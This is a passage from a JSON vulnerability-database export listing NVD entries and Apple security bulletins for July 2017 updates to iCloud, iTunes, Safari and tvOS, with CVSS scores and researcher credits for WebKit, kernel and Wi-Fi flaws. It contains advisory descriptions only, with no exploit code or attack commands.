before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7064", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2019-05-10T19:19:00", "cpe": ["cpe:/o:apple:iphone_os:10.3.2", "cpe:/a:apple:safari:10.1.1", "cpe:/a:apple:icloud:6.2.1", "cpe:/a:apple:itunes:12.6.1"], "id": "CVE-2017-7064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:itunes:12.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:icloud:6.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7061", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7061"], "modified": "2019-03-22T19:29:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7061", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7061", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7055", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7055"], "modified": "2019-03-21T21:03:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7055", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7056", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7056"], "modified": "2019-03-21T20:56:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7056", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}], "apple": [{"lastseen": "2020-12-24T20:43:14", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2.2\n\nReleased July 19, 2017\n\n**libxml2**\n\nAvailable for: Windows 7 and later\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-19T05:37:40", "published": "2017-07-19T05:37:40", "id": "APPLE:HT207927", "href": "https://support.apple.com/kb/HT207927", "title": "About the security content of iCloud for Windows 6.2.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6.2 for Windows\n\nReleased July 19, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An access issue was addressed with additional restrictions.\n\nCVE-2017-7053: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**libxml2**\n\nAvailable for: Windows 7 and later\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-19T05:43:08", "published": "2017-07-19T05:43:08", "id": "APPLE:HT207928", "href": "https://support.apple.com/kb/HT207928", "title": "About the security content of iTunes 12.6.2 for Windows - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1.2\n\nReleased July 19, 2017\n\n**Safari Printing**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to an infinite number of print dialogs\n\nDescription: An issue existed where a malicious or compromised website could show infinite print dialogs and make users believe their browser was locked. The issue was addressed through throttling of print dialogs.\n\nCVE-2017-7060: Travis Kelley of City of Mishawaka, Indiana\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: David Kohlbrenner of UC San Diego, an anonymous researcher\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed with improved frame handling.\n\nCVE-2017-7011: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6 \n\nImpact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-29T06:22:02", "published": "2017-07-29T06:22:02", "id": "APPLE:HT207921", "href": "https://support.apple.com/kb/HT207921", "title": "About the security content of Safari 10.1.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7062", "CVE-2017-7020", "CVE-2017-7008", "CVE-2017-7038", "CVE-2017-7026", "CVE-2017-7056", "CVE-2017-7024", "CVE-2017-7055", "CVE-2017-7022", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-9417", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7029", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7023", "CVE-2017-7066", "CVE-2017-7028", "CVE-2017-7025", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7069", "CVE-2017-7009", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7065", "CVE-2017-7047", "CVE-2017-7068", "CVE-2017-7030", "CVE-2017-7041", "CVE-2017-7027"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2.2\n\nReleased July 19, 2017\n\n**Contacts**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-7062: Shashank (@cyberboyIndia)\n\n**CoreAudio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved bounds checking.\n\nCVE-2017-7008: Yangkang (@dnpushme) of Qihoo 360 Qex Team\n\n**IOUSBFamily**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7009: shrek_wzw of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7022: an anonymous researcher\n\nCVE-2017-7024: an anonymous researcher\n\nCVE-2017-7026: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7023: an anonymous researcher\n\nCVE-2017-7025: an anonymous researcher\n\nCVE-2017-7027: an anonymous researcher\n\nCVE-2017-7069: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-7028: an anonymous researcher\n\nCVE-2017-7029: an anonymous researcher\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Unpacking a maliciously crafted archive may lead to arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-7068: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**libxpc**\n\nAvailable for: Apple TV (4th generation) \n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7047: Ian Beer of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: David Kohlbrenner of UC San Diego, an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7065: Gal Beniamini of Google Project Zero\n\nEntry added September 25, 2017\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker in Wi-Fi range may be able to cause a denial of service on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2017-7066: Gal Beniamini of Google Project Zero\n\nEntry added September 26, 2017\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-9417: Nitay Artenstein of Exodus Intelligence\n", "edition": 2, "modified": 